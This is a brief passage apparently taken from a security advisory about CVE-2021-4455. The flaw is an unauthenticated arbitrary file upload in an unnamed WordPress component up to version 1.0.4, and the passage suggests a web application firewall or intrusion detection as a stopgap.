This critical security flaw, labelled as CVE-2021-4455, affects all versions up to and including 1.0.4. This vulnerability is of particular concern as it creates a gaping hole in the security of WordPress sites, allowing unauthenticated attackers to execute remote code by uploading arbitrary files<\/a> to the server. This means that an attacker does not need any form of authentication to upload files<\/a> to the server. If this is not immediately feasible, using a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) can provide temporary mitigation. However, these measures can only limit the damage and are not permanent solutions.
